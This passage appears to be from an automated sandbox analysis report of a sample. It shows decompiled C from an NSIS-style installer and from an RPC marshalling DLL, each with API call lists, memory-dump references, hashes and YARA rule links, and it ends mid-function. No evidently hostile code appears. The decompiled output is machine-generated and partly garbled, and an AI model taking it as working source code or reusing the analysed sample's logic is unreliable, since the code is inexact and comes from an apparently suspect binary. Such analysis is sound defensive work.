                                                                                                			E0040266E(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029E8(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E0040548B(_t52) == 0) {
					E004029E8(0xffffffed);
				}
				E004055E3(_t52);
				_t27 = E00405602(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x42eb74; // 0x33000
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E00403098(_t47);
						E00403066(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402E44( *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E004055C3( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402E44(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                                                                0x0040266e
                                                                                                0x00402670
                                                                                                0x0040267c
                                                                                                0x0040267f
                                                                                                0x00402689
                                                                                                0x0040268d
                                                                                                0x0040268d
                                                                                                0x00402693
                                                                                                0x004026a0
                                                                                                0x004026a8
                                                                                                0x004026ab
                                                                                                0x004026b1
                                                                                                0x004026bf
                                                                                                0x004026c4
                                                                                                0x004026c8
                                                                                                0x004026cb
                                                                                                0x004026d4
                                                                                                0x004026e0
                                                                                                0x004026e4
                                                                                                0x004026e7
                                                                                                0x004026f1
                                                                                                0x00402710
                                                                                                0x004026f8
                                                                                                0x004026fd
                                                                                                0x00402705
                                                                                                0x00402708
                                                                                                0x0040270d
                                                                                                0x0040270d
                                                                                                0x00402717
                                                                                                0x00402717
                                                                                                0x00402729
                                                                                                0x00402730
                                                                                                0x00402742
                                                                                                0x00402742
                                                                                                0x00402748
                                                                                                0x00402748
                                                                                                0x00402753
                                                                                                0x00402754
                                                                                                0x00402758
                                                                                                0x0040275c
                                                                                                0x00402762
                                                                                                0x00402762
                                                                                                0x00402769
                                                                                                0x00402156
                                                                                                0x00402880
                                                                                                0x0040288c

                                                                                                APIs
                                                                                                • GlobalAlloc.KERNEL32(00000040,00033000,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                                                                                                • GlobalFree.KERNEL32 ref: 00402717
                                                                                                • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
                                                                                                • GlobalFree.KERNEL32 ref: 00402730
                                                                                                • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
                                                                                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3294113728-0
                                                                                                • Opcode ID: 1fe56166fb6cd4dbd5b8f8a47f0c0769986a224b60575e965902ed59b0249d4b
                                                                                                • Instruction ID: 8136da2242d6e6cba5f284f27b64b1989b358de0d737458f3662c87ad7b72ced
                                                                                                • Opcode Fuzzy Hash: 1fe56166fb6cd4dbd5b8f8a47f0c0769986a224b60575e965902ed59b0249d4b
                                                                                                • Instruction Fuzzy Hash: 4A318B71C00128BBDF216FA9CD49DAE7E79EF05324F10822AF520762E0C7795D419BA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA69E0, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 89COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA6A3D
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA6A7D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid array format type %x$invalid format type %x$memory_size = %d
                                                                                                • API String ID: 3997070919-2774118540
                                                                                                • Opcode ID: a9154dd20884a6f3dcac8aa34caa55a3db256c65f1fad07485fb021aac9ea188
                                                                                                • Instruction ID: c82bc5021b34ac91f2c91bfe38f889a9e7b1b06411b048f27f85e5b7d38b4f9d
                                                                                                • Opcode Fuzzy Hash: a9154dd20884a6f3dcac8aa34caa55a3db256c65f1fad07485fb021aac9ea188
                                                                                                • Instruction Fuzzy Hash: AA3180B5A00144EBCB04CF98D890DBEBBB6AF49245F14C198FA559B341E730DF51CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00404CC9, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00404CC9(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42e344; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42ec14; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E0040594D(0, _t39, 0x4297b0, 0x4297b0, _a4);
					}
					_t26 = lstrlenA(0x4297b0);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42e328, 0x4297b0);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x4297b0;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x4297b0)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x4297b0, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                                0x00404ccf
                                                                                                0x00404cdb
                                                                                                0x00404cde
                                                                                                0x00404ce4
                                                                                                0x00404cf0
                                                                                                0x00404cf3
                                                                                                0x00404cf6
                                                                                                0x00404cfc
                                                                                                0x00404cfc
                                                                                                0x00404d02
                                                                                                0x00404d0a
                                                                                                0x00404d0d
                                                                                                0x00404d2a
                                                                                                0x00404d2e
                                                                                                0x00404d37
                                                                                                0x00404d37
                                                                                                0x00404d41
                                                                                                0x00404d4a
                                                                                                0x00404d56
                                                                                                0x00404d5d
                                                                                                0x00404d61
                                                                                                0x00404d64
                                                                                                0x00404d77
                                                                                                0x00404d85
                                                                                                0x00404d85
                                                                                                0x00404d89
                                                                                                0x00404d8b
                                                                                                0x00404d8e
                                                                                                0x00000000
                                                                                                0x00404d8e
                                                                                                0x00404d0f
                                                                                                0x00404d17
                                                                                                0x00404d1f
                                                                                                0x00404d25
                                                                                                0x00000000
                                                                                                0x00404d25
                                                                                                0x00404d1f
                                                                                                0x00404d0d
                                                                                                0x00404d98

                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(004297B0,00000000,0041B732,73BCEA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                                                                                • lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041B732,73BCEA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                                                                                • lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041B732,73BCEA30), ref: 00404D25
                                                                                                • SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404D5D
                                                                                                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404D77
                                                                                                • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404D85
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                • String ID:
                                                                                                • API String ID: 2531174081-0
                                                                                                • Opcode ID: 259a6bfffd9455f75c7f37c98e6fd5d39197061d1bb8cf0c94f6c9d48c0e4d13
                                                                                                • Instruction ID: 8ccdf1774425cd87f0729cbca42791fc67af6cd1557da5970d5077929bdf2610
                                                                                                • Opcode Fuzzy Hash: 259a6bfffd9455f75c7f37c98e6fd5d39197061d1bb8cf0c94f6c9d48c0e4d13
                                                                                                • Instruction Fuzzy Hash: 17215EB1900158BBDF119FA5CD80A9EBFB9EF44364F14807AF944A6291C7394E41DF98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDAB0C0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7,?,?,?,00000002), ref: 6EDAB10A
                                                                                                • RpcRaiseException.RPCRT4(000006C6,?,?,?,?,?,00000002), ref: 6EDAB133
                                                                                                • RpcRaiseException.RPCRT4(000006C6,?,?,?,?,?,?,00000002), ref: 6EDAB18A
                                                                                                Strings
                                                                                                • invalid string length of %d, xrefs: 6EDAB121
                                                                                                • string not null-terminated at byte position %d, data is 0x%x, xrefs: 6EDAB178
                                                                                                • bufsize 0x%x exceeded buffer end %p of buffer %p, xrefs: 6EDAB0F8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: bufsize 0x%x exceeded buffer end %p of buffer %p$invalid string length of %d$string not null-terminated at byte position %d, data is 0x%x
                                                                                                • API String ID: 3997070919-2613499994
                                                                                                • Opcode ID: 90ee01f159f8c7e9a87168cfcaaddae769ac1158d0dd8a7c1d6280c2c1c90a54
                                                                                                • Instruction ID: e0e879815ff5b2d88601ab47c31eb9840ebf2cebffd9d464bdc51a9cb829431f
                                                                                                • Opcode Fuzzy Hash: 90ee01f159f8c7e9a87168cfcaaddae769ac1158d0dd8a7c1d6280c2c1c90a54
                                                                                                • Instruction Fuzzy Hash: 1D21F4B4600108EFDB04CF98C994DAABBB6AF89350B14C188F9594B385D731EE51CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA8700, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 71COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 16%
                                                                                                			E6EDA8700(void* __ecx, intOrPtr _a4, intOrPtr* _a8, signed char* _a12) {
				intOrPtr _v8;
				signed char* _t57;
				void* _t60;
				void* _t61;

				0x6eda0000("pStubMsg %p, pMemory %p, type 0x%02x\n", _a4, _a8,  *_a12 & 0x000000ff, __ecx);
				_t61 = _t60 + 0x10;
				if(( *_a12 & 0x000000ff) != 0x30) {
					0x6eda0000("invalid format type %x\n",  *_a12 & 0x000000ff);
					_t61 = _t61 + 8;
					__imp__RpcRaiseException(0x6e6);
				}
				0x6eda0000("flags: 0x%02x\n", _a12[1] & 0x000000ff);
				if(( *(_a4 + 0x20) & 0x000000ff) == 0) {
					__eflags = 1;
					_v8 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x60)) + 0x10)) + ( *(_a12 + (1 << 1)) & 0x000000ff) * 4));
				} else {
					_t57 = _a12;
					_t65 = _t57[1] & 0x80;
					if((_t57[1] & 0x80) == 0) {
						E6EDA2310(__eflags, _a4, _a8, 0);
					} else {
						E6EDA2310(_t65, _a4,  *_a8, 0);
					}
				}
				return 0;
			}







                                                                                                0x6eda8718
                                                                                                0x6eda871d
                                                                                                0x6eda8729
                                                                                                0x6eda8737
                                                                                                0x6eda873c
                                                                                                0x6eda8744
                                                                                                0x6eda8744
                                                                                                0x6eda875f
                                                                                                0x6eda8770
                                                                                                0x6eda87b7
                                                                                                0x6eda87c6
                                                                                                0x6eda8772
                                                                                                0x6eda877a
                                                                                                0x6eda8781
                                                                                                0x6eda8786
                                                                                                0x6eda87a5
                                                                                                0x6eda8788
                                                                                                0x6eda8794
                                                                                                0x6eda8794
                                                                                                0x6eda87aa
                                                                                                0x6eda87ce

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA8744
                                                                                                • _NdrClientContextMarshall@12.SOZZ(?,?,00000000), ref: 6EDA8794
                                                                                                • _NdrClientContextMarshall@12.SOZZ(?,?,00000000), ref: 6EDA87A5
                                                                                                  • Part of subcall function 6EDA2310: RpcRaiseException.RPCRT4(000006F7), ref: 6EDA2380
                                                                                                  • Part of subcall function 6EDA2310: NDRCContextMarshall.RPCRT4(?,?), ref: 6EDA2391
                                                                                                Strings
                                                                                                • invalid format type %x, xrefs: 6EDA8732
                                                                                                • flags: 0x%02x, xrefs: 6EDA875A
                                                                                                • pStubMsg %p, pMemory %p, type 0x%02x, xrefs: 6EDA8713
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Context$ClientExceptionMarshall@12Raise$Marshall
                                                                                                • String ID: flags: 0x%02x$invalid format type %x$pStubMsg %p, pMemory %p, type 0x%02x
                                                                                                • API String ID: 1309183824-1391298755
                                                                                                • Opcode ID: 22964cc801c03ed750a5145dfd2f57dde8094cc846dc39fbd6f8979b71750162
                                                                                                • Instruction ID: 950e20e37f5f3fefb779bb9858691aa9f040bed0cae301a99980cef6796a50be
                                                                                                • Opcode Fuzzy Hash: 22964cc801c03ed750a5145dfd2f57dde8094cc846dc39fbd6f8979b71750162
                                                                                                • Instruction Fuzzy Hash: 7D21B6B9604285ABD744CF99C8A1FAA77A9BB86340F008558FD658B381D631EA10CBB1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00404598, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00404598(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                0x004045a6
                                                                                                0x004045b3
                                                                                                0x004045b9
                                                                                                0x004045f7
                                                                                                0x004045f7
                                                                                                0x00404606
                                                                                                0x0040460d
                                                                                                0x00000000
                                                                                                0x0040460f
                                                                                                0x004045bb
                                                                                                0x004045ca
                                                                                                0x004045d2
                                                                                                0x004045d5
                                                                                                0x004045e7
                                                                                                0x004045ed
                                                                                                0x004045f4
                                                                                                0x00000000
                                                                                                0x004045f4
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004045B3
                                                                                                • GetMessagePos.USER32 ref: 004045BB
                                                                                                • ScreenToClient.USER32 ref: 004045D5
                                                                                                • SendMessageA.USER32(?,00001111,00000000,?), ref: 004045E7
                                                                                                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040460D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                • String ID: f
                                                                                                • API String ID: 41195575-1993550816
                                                                                                • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                • Instruction ID: 6b317f608504f5286e083177801d0cb87e447db18072776417f46e2e8b339eff
                                                                                                • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                • Instruction Fuzzy Hash: 5C014C71D00219BADB00DBA4DC85BEEBBB8AF59711F10016ABB00B61D0D7B8A9458BA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00402B2D, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414b78; // 0xcb782
					_t11 =  *0x428b88; // 0xcb786
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                                0x00402b3a
                                                                                                0x00402b48
                                                                                                0x00402b4e
                                                                                                0x00402b4e
                                                                                                0x00402b5c
                                                                                                0x00402b5e
                                                                                                0x00402b64
                                                                                                0x00402b6b
                                                                                                0x00402b6d
                                                                                                0x00402b6d
                                                                                                0x00402b83
                                                                                                0x00402b93
                                                                                                0x00402ba5
                                                                                                0x00402ba5
                                                                                                0x00402bad

                                                                                                APIs
                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
                                                                                                • MulDiv.KERNEL32(000CB782,00000064,000CB786), ref: 00402B73
                                                                                                • wsprintfA.USER32 ref: 00402B83
                                                                                                • SetWindowTextA.USER32(?,?), ref: 00402B93
                                                                                                • SetDlgItemTextA.USER32 ref: 00402BA5
                                                                                                Strings
                                                                                                • verifying installer: %d%%, xrefs: 00402B7D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                • String ID: verifying installer: %d%%
                                                                                                • API String ID: 1451636040-82062127
                                                                                                • Opcode ID: 821183565d5cfc23d2a1d69bdf9aca7d49efffeabee144d451769c9d9fec15d5
                                                                                                • Instruction ID: d97cc89adede162bb954025147407c84299f45570db21cfab8362f7584a841fe
                                                                                                • Opcode Fuzzy Hash: 821183565d5cfc23d2a1d69bdf9aca7d49efffeabee144d451769c9d9fec15d5
                                                                                                • Instruction Fuzzy Hash: 25014470A00209BBEB219F60DD09FAE3779AB04305F008039FA06A92D0D7B9A9518B59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDAD830, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 245COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 49%
                                                                                                			E6EDAD830(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24, signed int _a28) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _t227;

				_v28 = _a4 & 0x000000ff;
				_v28 = _v28 - 0x1b;
				if(_v28 > 0xa) {
					L57:
					_t227 = _a4 & 0x000000ff;
					0x6eda0000("unknown array format 0x%x\n", _t227);
					__imp__RpcRaiseException(0x6f7);
					return _t227;
				}
				_t7 = _v28 + 0x6edade1c; // 0xcccccc03
				switch( *((intOrPtr*)(( *_t7 & 0x000000ff) * 4 +  &M6EDADE08))) {
					case 0:
						_v12 =  *((intOrPtr*)(_a16 + 2));
						_v5 = ( *(_a16 + (1 << 0)) & 0x000000ff) + 1;
						_v24 = E6EDAAEC0(_v12 & 0x0000ffff,  *(_a8 + 0x3c));
						_v16 = _v24;
						_a16 = E6EDAA440(_a8, _a16 + 4);
						E6EDA73D0(_a8 + 4, _a8 + 4, _v5 & 0x000000ff);
						_t297 = _t293 + 0x18;
						if((_a28 & 0x000000ff) == 0) {
							L11:
							return _v16;
						} else {
							if((_a20 & 0x000000ff) == 0) {
								__eflags = _a24 & 0x000000ff;
								if((_a24 & 0x000000ff) != 0) {
									_t249 = _a8;
									__eflags =  *(_t249 + 0x20) & 0x000000ff;
									if(( *(_t249 + 0x20) & 0x000000ff) == 0) {
										__eflags =  *_a12;
										if( *_a12 == 0) {
											 *_a12 =  *(_a8 + 4);
										}
									}
								}
							} else {
								_t251 = E6EDAA3B0(_v24, _a8, _v24);
								_t297 = _t297 + 8;
								 *_a12 = _t251;
							}
							_v20 =  *(_a8 + 4);
							E6EDAAF00(_a8, _v16);
							 *((intOrPtr*)(_a8 + 0x10)) = _v20;
							E6EDAC2B0(_a8, _v20,  *_a12, _a16, _a20 & 0x000000ff);
							_push( *_a12);
							_push(_v20);
							_push("copying %p to %p\n");
							0x6eda0000();
							if( *_a12 != _v20) {
								E6EDB0120( *_a12, _v20, _v16);
							}
							goto L11;
						}
					case 1:
						__eax = _a16;
						__cx =  *((intOrPtr*)(__eax + 2));
						_v12 =  *((intOrPtr*)(__eax + 2));
						1 = 1 << 0;
						__eax = _a16;
						 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) + 1;
						_v5 = __cl;
						_a16 = _a16 + 4;
						__eax = _a8;
						_a16 = E6EDAA440(_a8, _a16 + 4);
						__ecx = _a8;
						__edx =  *(_a8 + 0x3c);
						__eax = _a16;
						__ecx = _a8;
						_a16 = E6EDAA540(__ecx, __ecx, _a16,  *(_a8 + 0x3c));
						__edx = _v5 & 0x000000ff;
						_a8 = _a8 + 4;
						__eax = E6EDA73D0(__ecx, _a8 + 4, _v5 & 0x000000ff);
						__ecx = _a8;
						__edx =  *(_a8 + 0x44);
						__eax = _v12 & 0x0000ffff;
						_v16 = E6EDAAEC0(_v12 & 0x0000ffff,  *(_a8 + 0x44));
						__ecx = _a8;
						__edx =  *(_a8 + 0x3c);
						__eax = _v12 & 0x0000ffff;
						_v24 = E6EDAAEC0(_v12 & 0x0000ffff,  *(_a8 + 0x3c));
						__ecx = _a28 & 0x000000ff;
						__eflags = _a28 & 0x000000ff;
						if((_a28 & 0x000000ff) != 0) {
							__edx = _a8;
							__eax =  *(__edx + 0x40);
							_v40 =  *(__edx + 0x40);
							__ecx = _a20 & 0x000000ff;
							__eflags = _a20 & 0x000000ff;
							if((_a20 & 0x000000ff) == 0) {
								__edx = _a12;
								__eflags =  *_a12;
								if( *_a12 == 0) {
									_a20 = 1;
								}
							}
							__eax = _a20 & 0x000000ff;
							__eflags = _a20 & 0x000000ff;
							if((_a20 & 0x000000ff) != 0) {
								__ecx = _v24;
								__edx = _a8;
								__eax = E6EDAA3B0(_v24, _a8, _v24);
								__ecx = _a12;
								 *_a12 = __eax;
							}
							__edx = _a8;
							__eax =  *(__edx + 4);
							_v20 =  *(__edx + 4);
							__ecx = _v16;
							__edx = _a8;
							E6EDAAF00(_a8, _v16) = _a8;
							__ecx = _v20;
							 *((intOrPtr*)(_a8 + 0x10)) = _v20;
							__edx = _a20 & 0x000000ff;
							__eax = _a16;
							__ecx = _a12;
							__edx =  *_a12;
							__eax = _v20;
							__ecx = _a8;
							__eax = E6EDAC2B0(_a8, _v20,  *_a12, _a16, _a20 & 0x000000ff);
							__edx = _v16;
							__eax = _v20;
							__ecx = _a12;
							 *_a12 =  *_a12 + _v40;
							__eflags =  *_a12 + _v40;
							__eax = E6EDB0120( *_a12 + _v40, _v20, _v16);
						}
